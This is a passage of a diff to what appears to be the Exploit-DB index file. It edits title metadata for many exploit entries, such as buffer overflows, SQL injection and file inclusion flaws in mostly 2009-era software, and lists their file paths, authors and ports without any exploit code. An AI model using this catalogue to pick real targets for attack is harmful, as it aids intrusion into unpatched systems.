(Metasploit)",2005-04-12,patrick,linux,remote,2525 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow (Metasploit)",2000-04-16,patrick,linux,remote,143 10026,platforms/linux/remote/10026.rb,"Snort 2.4.0 < 2.4.3 - Back Orifice Pre-Preprocessor Remote Exploit (Metasploit)",2005-10-18,"KaiJern Lau",linux,remote,9080 -10027,platforms/linux/remote/10027.rb,"PeerCast <= 0.1216 (Metasploit)",2006-03-08,MC,linux,remote,7144 +10027,platforms/linux/remote/10027.rb,"PeerCast 0.1216 (Metasploit)",2006-03-08,MC,linux,remote,7144 10028,platforms/cgi/remote/10028.rb,"Linksys WRT54G < 4.20.7 / WRT54GS < 1.05.2 - apply.cgi Buffer Overflow (Metasploit)",2005-09-13,"Raphael Rigo",cgi,remote,80 10029,platforms/linux/remote/10029.rb,"Berlios GPSD 1.91-1 < 2.7-2 - Format String",2005-05-25,"Yann Senotier",linux,remote,2947 10030,platforms/linux/remote/10030.rb,"DD-WRT HTTP v24-SP1 - Command Injection",2009-07-20,"H D Moore",linux,remote,80 -10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server <= 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,cgi,webapps,443 +10031,platforms/cgi/webapps/10031.rb,"Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 - masterCGI Command Injection (Metasploit)",2007-09-17,patrick,cgi,webapps,443 10032,platforms/linux/remote/10032.rb,"Unreal Tournament 2004 - 'Secure' Overflow (Metasploit)",2004-07-18,onetwo,linux,remote,7787 10033,platforms/irix/remote/10033.rb,"Irix LPD tagprinter - Command Execution (Metasploit)",2001-09-01,"H D Moore",irix,remote,515 10034,platforms/hp-ux/remote/10034.rb,"HP-UX LPD 10.20 / 11.00 / 11.11 - Command Execution (Metasploit)",2002-08-28,"H D Moore",hp-ux,remote,515 -10035,platforms/bsd/remote/10035.rb,"Xtacacsd <= 4.1.2 - report Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 +10035,platforms/bsd/remote/10035.rb,"Xtacacsd 4.1.2 - report Buffer Overflow (Metasploit)",2008-01-08,MC,bsd,remote,49 10036,platforms/solaris/remote/10036.rb,"System V Derived /bin/login Extraneous Arguments Buffer Overflow (modem based) (Metasploit)",2001-12-12,I)ruid,solaris,remote,0 10037,platforms/cgi/webapps/10037.rb,"Mercantec SoftCart 4.00b - CGI Overflow (Metasploit)",2004-08-19,skape,cgi,webapps,0 10038,platforms/linux/local/10038.txt,"proc File Descriptors Directory Permissions bypass",2009-10-23,"Pavel Machek",linux,local,0 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0 -10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 +10042,platforms/php/webapps/10042.txt,"Achievo 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0 10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0 10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0 10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion",2009-10-12,NoGe,php,webapps,0 @@ -9419,9 +9419,9 @@ id,file,description,date,author,platform,type,port 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - XSS/CSRF/LFI/Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 10052,platforms/php/webapps/10052.txt,"The BMW inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0 10053,platforms/windows/remote/10053.txt,"httpdx 1.4 Get Request Buffer Overflow",2009-10-08,"Pankaj Kohli",windows,remote,80 -10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp <= 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 +10054,platforms/windows/remote/10054.txt,"SAP GUI VSFlexGrid.VSFlexGridL sp 14 - Buffer Overflow",2008-11-26,"Elazar Broad",windows,remote,0 10055,platforms/hardware/remote/10055.txt,"HP Multiple LaserJet Printer - XSS",2009-07-04,sh2kerr,hardware,remote,80 -10056,platforms/windows/remote/10056.py,"Ada Image Server <= 0.6.7 imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 +10056,platforms/windows/remote/10056.py,"Ada Image Server 0.6.7 imgsrv.exe Buffer Overflow",2009-10-07,blake,windows,remote,1235 10057,platforms/php/webapps/10057.txt,"Aiocp 1.4.001 File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps,0 10058,platforms/php/webapps/10058.pl,"Joomla Recerca component SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps,0 @@ -9438,24 +9438,24 @@ id,file,description,date,author,platform,type,port 10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - DoS",2009-10-02,PLATEN,windows,dos,21 10074,platforms/novell/webapps/10074.txt,"Novell eDirectory 8.8 SP5 - 'dconserv.dlm' Cross-Site Scripting",2009-10-01,"Francis Provencher",novell,webapps,8030 10075,platforms/novell/webapps/10075.txt,"Novell Edirectory 8.8 SP5 - XSS",2009-09-23,"Francis Provencher",novell,webapps,8030 -10076,platforms/osx/local/10076.c,"VMWare Fusion <= 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 +10076,platforms/osx/local/10076.c,"VMWare Fusion 2.0.5 - vmx86 kext Kernel Local Root Exploit",2009-10-02,mu-b,osx,local,0 10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -10078,platforms/osx/local/10078.c,"VMWare Fusion <= 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 +10078,platforms/osx/local/10078.c,"VMWare Fusion 2.0.5 vmx86 kext Local PoC",2009-10-02,mu-b,osx,local,0 10079,platforms/windows/remote/10079.txt,"Google Apps mailto uri handler cross-browser Remote command execution",2009-10-01,pyrokinesis,windows,remote,0 33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry SEH/Unicode Buffer Overflow",2014-05-19,"Mike Czumak",windows,local,0 -33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 -33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Include",2010-01-07,Saywhat,php,webapps,0 +33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 +33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Inclusion",2010-01-07,Saywhat,php,webapps,0 33428,platforms/windows/webapps/33428.py,"SafeNet Sentinel Protection Server 7.0 < 7.4_ Sentinel Keys Server 1.0.3 < 1.0.4 - Directory Traversal",2014-05-19,"Matt Schmidt",windows,webapps,7002 33431,platforms/windows/remote/33431.html,"AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 -10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS <= 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 -10082,platforms/php/webapps/10082.txt,"PBBoard <= 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 -10083,platforms/php/remote/10083.txt,"PHP <= 5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 +10081,platforms/hardware/remote/10081.txt,"Palm Pre WebOS 1.1 - Remote File Access",2009-10-05,"Townsend Ladd Harris",hardware,remote,0 +10082,platforms/php/webapps/10082.txt,"PBBoard 2.0.2 - Full Path Disclosure",2009-10-06,rUnViRuS,php,webapps,0 +10083,platforms/php/remote/10083.txt,"PHP 5.3 - preg_match() full path disclosure",2009-09-27,"David Vieira-Kurz",php,remote,0 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Local Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10086,platforms/multiple/remote/10086.txt,"WebKit 'Document()' Function Remote Information Disclosure",2009-11-12,"Chris Evans",multiple,remote,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 -10089,platforms/php/webapps/10089.txt,"WordPress <= 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 +10089,platforms/php/webapps/10089.txt,"WordPress 2.8.5 - Unrestricted File Upload Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote DoS",2009-10-06,"Francis Provencher",windows,dos,515 10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0 @@ -9485,19 +9485,19 @@ id,file,description,date,author,platform,type,port 10168,platforms/php/webapps/10168.txt,"Shoutbox 1.0 HTML / XSS Injection",2009-11-18,SkuLL-HackeR,php,webapps,0 10169,platforms/php/webapps/10169.txt,"phpMyBackupPro - Arbitrary File Download",2009-11-16,"Amol Naik",php,webapps,0 10170,platforms/multiple/webapps/10170.txt,"Xerver 4.31 / 4.32 - HTTP Response Splitting",2009-11-18,s4squatch,multiple,webapps,80 -10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 Vulnerbility found Denial of Service (0Day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 +10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 found Denial of Service (0Day)",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 10176,platforms/windows/dos/10176.txt,"HP Openview NNM 7.53 Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla Ext. iF Portfolio Nexus SQL injection",2009-11-18,"599eme Man",php,webapps,0 -10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Include",2009-10-20,kaMtiEz,php,webapps,0 +10178,platforms/php/webapps/10178.txt,"Joomla / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Mutliple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"bitrix site manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 -10182,platforms/hardware/dos/10182.py,"2wire Router <= 5.29.52 - Remote DoS",2009-10-29,hkm,hardware,dos,0 +10182,platforms/hardware/dos/10182.py,"2wire Router 5.29.52 - Remote DoS",2009-10-29,hkm,hardware,dos,0 10183,platforms/php/webapps/10183.php,"Joomla 1.5.12 RCE via TinyMCE - Upload",2009-11-19,daath,php,webapps,80 10184,platforms/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",linux,dos,0 10185,platforms/bsd/dos/10185.txt,"SeaMonkey 1.1.8 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 10186,platforms/bsd/dos/10186.txt,"K-Meleon 1.5.3 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 10187,platforms/bsd/dos/10187.txt,"Opera 10.01 - Remote Array Overrun",2009-11-19,"Maksymilian Arciemowicz and sp3x",bsd,dos,0 -10189,platforms/php/webapps/10189.txt,"Betsy CMS versions <= 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps,0 +10189,platforms/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,php,webapps,0 10190,platforms/windows/dos/10190.txt,"Cisco VPN Client Integer Overflow (DOS)",2009-11-21,"Alex Hernandez",windows,dos,0 10192,platforms/php/webapps/10192.txt,"Joomla Component Com_Joomclip (cat) SQL injection",2009-11-21,"599eme Man",php,webapps,0 10201,platforms/windows/local/10201.pl,"TEKUVA Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 @@ -9508,17 +9508,17 @@ id,file,description,date,author,platform,type,port 10206,platforms/linux/dos/10206.txt,"Expat 2.0.1 UTF-8 Character XML Parsing Remote Denial of Service",2009-11-12,"Peter Valchev",linux,dos,0 10207,platforms/multiple/local/10207.txt,"VMWare Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 10208,platforms/windows/dos/10208.txt,"Firefox + Adobe - Memory Corruption PoC",2009-10-14,Skylined,windows,dos,0 -10209,platforms/multiple/webapps/10209.txt,"Everfocus <= 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 +10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10212,platforms/windows/local/10212.txt,"Autodesk 3DS Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery (farbinform_krell) Remote SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 -10216,platforms/php/webapps/10216.txt,"kr-web <= 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 -10217,platforms/php/webapps/10217.txt,"NukeHall <= 0.3 - Multiple Remote File Inclusion Vulnerabilities",2009-11-24,"cr4wl3r ",php,webapps,0 -10218,platforms/php/webapps/10218.txt,"outreach project tool <= 1.2.6 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 -10219,platforms/php/webapps/10219.txt,"phptraverse <= 0.8.0 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 -10220,platforms/php/webapps/10220.txt,"pointcomma <= 3.8b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 +10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 +10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 +10217,platforms/php/webapps/10217.txt,"NukeHall 0.3 - Multiple Remote File Inclusion Vulnerabilities",2009-11-24,"cr4wl3r ",php,webapps,0 +10218,platforms/php/webapps/10218.txt,"outreach project tool 1.2.6 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 +10219,platforms/php/webapps/10219.txt,"phptraverse 0.8.0 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 +10220,platforms/php/webapps/10220.txt,"pointcomma 3.8b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 10221,platforms/windows/dos/10221.txt,"XM Easy Personal FTP Server 5.8.0 - Remote DoS",2009-11-24,leinakesi,windows,dos,21 10222,platforms/php/webapps/10222.txt,"W3infotech (Auth Bypass) SQL Injection",2009-11-24,ViRuS_HiMa,php,webapps,0 10223,platforms/windows/dos/10223.txt,"TYPSoft 1.10 - APPE DELE DoS",2009-11-24,leinakesi,windows,dos,21 @@ -9526,24 +9526,24 @@ id,file,description,date,author,platform,type,port 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection",2009-11-25,S@BUN,php,webapps,0 -10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus <= 1.20 - Vulnerabilities",2009-11-25,MustLive,php,webapps,0 +10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus 1.20 - Vulnerabilities",2009-11-25,MustLive,php,webapps,0 10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow",2009-11-24,"Chris Evans",multiple,dos,0 -10230,platforms/php/webapps/10230.txt,"Fake Hit Generator <= 2.2 Shell Upload",2009-11-25,DigitALL,php,webapps,0 +10230,platforms/php/webapps/10230.txt,"Fake Hit Generator 2.2 Shell Upload",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure",2009-11-25,"kurdish hackers team",php,webapps,0 -10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 - (gcid) Remote SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 +10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 - (gcid) SQL Injection",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 10233,platforms/php/webapps/10233.txt,"phpBazar-2.1.1fix Remote Administration-Panel",2009-11-25,"kurdish hackers team",php,webapps,0 10234,platforms/php/webapps/10234.txt,"Cacti 0.8.7e - Multiple Vulnerabilities",2009-11-26,"Moritz Naumann",php,webapps,0 10235,platforms/windows/remote/10235.py,"Eureka Mail Client Remote Buffer Overflow Exploit",2009-11-26,"Dr_IDE and dookie",windows,remote,0 10236,platforms/php/webapps/10236.txt,"Flashden Multiple File Uploader Shell Upload",2009-11-26,DigitALL,php,webapps,0 10237,platforms/hardware/dos/10237.txt,"Allegro RomPager 2.10 Malformed URL Request DoS",2000-06-01,netsec,hardware,dos,80 -10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - Remote SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 +10238,platforms/php/webapps/10238.txt,"Joomla Component com_lyftenbloggie 1.04 - SQL Injection",2009-11-28,kaMtiEz,php,webapps,0 10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow Exploit",2009-11-28,Molotov,windows,local,0 10241,platforms/php/webapps/10241.txt,"Uploaderr 1.0 - File Hosting Script Shell Upload",2009-11-28,DigitALL,php,webapps,0 10242,platforms/php/dos/10242.txt,"PHP < 5.3.1 - 'multipart/form-data' Denial of Service Exploit (Python)",2009-11-27,Eren,php,dos,0 10243,platforms/php/dos/10243.txt,"PHP - MultiPart Form-Data Denial of Service PoC",2009-11-22,"Bogdan Calin",php,dos,0 10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack-Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0 -10245,platforms/php/webapps/10245.txt,"phpBazar <= 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 -10246,platforms/php/webapps/10246.txt,"SweetRice <= 0.5.3 - Remote File Include",2009-11-29,"cr4wl3r ",php,webapps,0 +10245,platforms/php/webapps/10245.txt,"phpBazar 2.1.1fix (cid) SQL Injection",2009-11-28,MizoZ,php,webapps,0 +10246,platforms/php/webapps/10246.txt,"SweetRice 0.5.3 - Remote File Inclusion",2009-11-29,"cr4wl3r ",php,webapps,0 10247,platforms/hardware/webapps/10247.txt,"Micronet SP1910 Data Access Controller UI XSS & HTML Code Injection",2009-11-27,K053,hardware,webapps,0 10248,platforms/php/webapps/10248.txt,"sugar crm 5.5.0.rc2 / 5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,php,webapps,0 10249,platforms/php/webapps/10249.txt,"adaptcms lite 1.5 - Remote File Inclusion",2009-11-29,v3n0m,php,webapps,0 @@ -9555,11 +9555,11 @@ id,file,description,date,author,platform,type,port 10256,platforms/php/webapps/10256.txt,"WP-Polls 2.x Incorrect Flood Filter",2009-11-30,Jbyte,php,webapps,0 10257,platforms/windows/dos/10257.py,"XM Easy Professional FTP Server 5.8.0 - Denial of Service",2009-11-30,"Mert SARICA",windows,dos,21 10258,platforms/windows/remote/10258.pl,"Golden FTP Server 4.30 - File Deletion",2009-12-01,sharpe,windows,remote,21 -10259,platforms/php/webapps/10259.txt,"Ciamos CMS <= 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 +10259,platforms/php/webapps/10259.txt,"Ciamos CMS 0.9.5 - (module_path) Remote File Inclusion",2009-12-01,"cr4wl3r ",php,webapps,0 10260,platforms/php/webapps/10260.txt,"Robert Zimmerman PHP / MYSQL Scripts Admin Bypass",2009-12-01,DUNDEE,php,webapps,0 10261,platforms/linux/webapps/10261.txt,"DotDefender 3.8-5 - Remote Command Execution",2009-12-01,"John Dos",linux,webapps,80 -10262,platforms/linux/webapps/10262.txt,"ISPworker <= 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 -10263,platforms/linux/webapps/10263.txt,"quate CMS <= 0.3.5 - (RFIi/LFI) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 +10262,platforms/linux/webapps/10262.txt,"ISPworker 1.23 - Remote File Disclosure Exploit",2009-12-01,"cr4wl3r ",linux,webapps,80 +10263,platforms/linux/webapps/10263.txt,"quate CMS 0.3.5 - (RFIi/LFI) Multiple Vulnerabilities",2009-12-01,"cr4wl3r ",linux,webapps,80 10264,platforms/multiple/local/10264.txt,"Oracle SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10265,platforms/multiple/local/10265.txt,"Oracle SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10266,platforms/multiple/local/10266.txt,"Oracle ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 @@ -9567,33 +9567,33 @@ id,file,description,date,author,platform,type,port 10268,platforms/multiple/local/10268.txt,"Oracle SYS.LT.REMOVEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0 10272,platforms/php/webapps/10272.txt,"Joomla Joaktree Component 1.0 - SQL Injection",2009-12-01,"Don Tukulesto",php,webapps,0 -10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component 0.15 - Multiple Remote File Include Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 +10273,platforms/php/webapps/10273.txt,"Joomla MojoBlog Component 0.15 - Multiple Remote File Inclusion Vulnerabilities",2009-12-01,kaMtiEz,php,webapps,0 10274,platforms/php/webapps/10274.txt,"Simple Machines Forum Multiple Security Vulnerabilities",2009-12-02,"SimpleAudit Team",php,webapps,0 10275,platforms/php/webapps/10275.txt,"Kide Shoutbox 0.4.6 - XSS & AXFR",2009-12-02,andresg888,php,webapps,0 10276,platforms/hardware/webapps/10276.txt,"Huawei MT882 Modem/Router - Multiple Vulnerabilities",2009-12-03,DecodeX01,hardware,webapps,0 -10277,platforms/php/webapps/10277.txt,"Thatware <= 0.5.3 - Multiple Remote File Include Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 -10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter <= 2.53 build 330 - Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 +10277,platforms/php/webapps/10277.txt,"Thatware 0.5.3 - Multiple Remote File Inclusion Exploit",2009-12-03,"cr4wl3r ",php,webapps,0 +10280,platforms/windows/local/10280.py,"AIMP2 Audio Converter 2.53 build 330 - Playlist (.pls) Unicode BOF",2009-11-21,mr_me,windows,local,0 10281,platforms/windows/local/10281.php,"Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow Exploit",2009-12-03,pyrokinesis,windows,local,0 10282,platforms/linux/remote/10282.py,"OrzHTTPd Format String Exploit",2009-12-03,"Patroklos Argyroudis",linux,remote,80 10284,platforms/php/webapps/10284.txt,"ita-forum 5.1.32 SQL Injection",2009-11-30,BAYBORA,php,webapps,0 10285,platforms/php/webapps/10285.txt,"Public Media Manager",2009-12-01,"cr4wl3r ",php,webapps,0 -10286,platforms/php/webapps/10286.txt,"OpenCSP Multiple Remote File Include",2009-11-25,EANgel,php,webapps,0 +10286,platforms/php/webapps/10286.txt,"OpenCSP Multiple Remote File Inclusion",2009-11-25,EANgel,php,webapps,0 10287,platforms/php/webapps/10287.txt,"MundiMail 0.8.2 - Remote Code Execution",2009-09-07,Dedalo,php,webapps,0 -10288,platforms/php/webapps/10288.txt,"SAPID SHOP <= 1.3 - Remote File Include",2009-12-03,"cr4wl3r ",php,webapps,0 -10289,platforms/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Includes",2009-11-25,DigitALL,php,webapps,0 +10288,platforms/php/webapps/10288.txt,"SAPID SHOP 1.3 - Remote File Inclusion",2009-12-03,"cr4wl3r ",php,webapps,0 +10289,platforms/php/webapps/10289.txt,"Power BB 1.8.3 - Remote File Inclusions",2009-11-25,DigitALL,php,webapps,0 10290,platforms/php/webapps/10290.txt,"Theeta CMS - Multiple Vulnerabilities",2009-12-03,c0dy,php,webapps,0 10291,platforms/php/webapps/10291.txt,"Joomla! ProofReader Component 1.0 RC6 - Cross-Site Scripting",2009-12-01,MustLive,php,webapps,0 10292,platforms/multiple/webapps/10292.txt,"Apache Tomcat 3.2.1 - 404 Error Page Cross-Site Scripting",2009-12-01,MustLive,multiple,webapps,0 -10293,platforms/php/webapps/10293.txt,"PHP-Nuke <= 8.0 - XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 +10293,platforms/php/webapps/10293.txt,"PHP-Nuke 8.0 - XSS & HTML Code Injection in News Module",2009-11-27,K053,php,webapps,0 10294,platforms/php/webapps/10294.txt,"OSI Codes PHP Live! Support 3.1 - Remote File Inclusion",2009-11-24,"Don Tukulesto",php,webapps,0 10295,platforms/windows/local/10295.txt,"DAZ Studio Arbitrary Command Execution",2009-12-03,"Core Security",windows,local,0 10296,platforms/php/local/10296.txt,"PHP 'ini_restore()' Memory Information Disclosure",2009-12-03,"Maksymilian Arciemowicz",php,local,0 -10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart (prodid) Remote SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 +10297,platforms/php/webapps/10297.php,"Vivid Ads Shopping Cart (prodid) SQL Injection",2009-12-03,"Yakir Wizman",php,webapps,0 10298,platforms/windows/local/10298.c,"Jasc Paint Shop Pro 8 - Local Buffer Overflow Exploit (Universal)",2009-12-04,"fl0 fl0w",windows,local,0 10299,platforms/php/webapps/10299.txt,"GeN3 forum 1.3 - SQL Injection",2009-12-04,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb <= 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0 +10302,platforms/php/webapps/10302.txt,"427BB Fourtwosevenbb 2.3.2 - SQL Injection Exploit",2009-12-04,"cr4wl3r ",php,webapps,0 10303,platforms/windows/dos/10303.py,"Core FTP Server 1.0 Build 319 - Denial of Service",2009-12-04,"Mert SARICA",windows,dos,0 -10304,platforms/php/webapps/10304.txt,"Invision Power Board <= 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 +10304,platforms/php/webapps/10304.txt,"Invision Power Board 3.0.4 / <= 3.0.4 / <= 2.3.6 - LFI and SQL Injection",2009-12-04,"Dawid Golunski",php,webapps,0 10305,platforms/php/webapps/10305.txt,"UBB.threads 7.5.4 2 - Multiple File Inclusion Vulnerabilities",2009-12-04,R3VAN_BASTARD,php,webapps,0 10306,platforms/php/webapps/10306.txt,"Achievo 1.4.2 - Arbitrary File Upload",2009-12-04,"Nahuel Grisolia",php,webapps,0 10307,platforms/php/webapps/10307.txt,"Achievo 1.4.2 Permanent Cross-Site Scripting",2009-12-04,"Nahuel Grisolia",php,webapps,0 @@ -9610,34 +9610,34 @@ id,file,description,date,author,platform,type,port 10325,platforms/php/webapps/10325.txt,"WordPress Image Manager Plugins - 